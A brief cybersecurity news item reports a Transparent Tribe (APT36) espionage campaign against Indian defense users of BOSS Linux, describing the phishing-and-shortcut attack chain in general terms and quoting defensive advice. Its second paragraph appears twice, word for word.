Indian defense organizations with systems running on Bharat Operating System Solutions Linux have been targeted by Pakistan-linked threat operation Transparent Tribe, also known as APT36, as part of a new cyberespionage campaign initially detected in early June, according to Hackread.
Intrusions commence with the distribution of phishing emails containing a compressed file with a nefarious shortcut file, which triggers the appearance of a seemingly normal PowerPoint file while downloading and executing the malicious BOSS.elf program that seeks to infiltrate the host system, a report from Cyfirma showed. Such a multi-stage attack campaign, which sought to ensure clandestine compromise, was noted to be indicative of Transparent Tribe's evolving capabilities that should prompt the immediate implementation of robust threat detection systems and cybersecurity measures. "Prevention improves when BOSS Linux images disable the auto-execution of desktop shortcuts and enforce application-allow lists that limit what runs outside signed repositories," said Sectigo's Jason Soroko.
Intrusions commence with the distribution of phishing emails containing a compressed file with a nefarious shortcut file, which triggers the appearance of a seemingly normal PowerPoint file while downloading and executing the malicious BOSS.elf program that seeks to infiltrate the host system, a report from Cyfirma showed. Such a multi-stage attack campaign, which sought to ensure clandestine compromise, was noted to be indicative of Transparent Tribe's evolving capabilities that should prompt the immediate implementation of robust threat detection systems and cybersecurity measures. "Prevention improves when BOSS Linux images disable the auto-execution of desktop shortcuts and enforce application-allow lists that limit what runs outside signed repositories," said Sectigo's Jason Soroko.
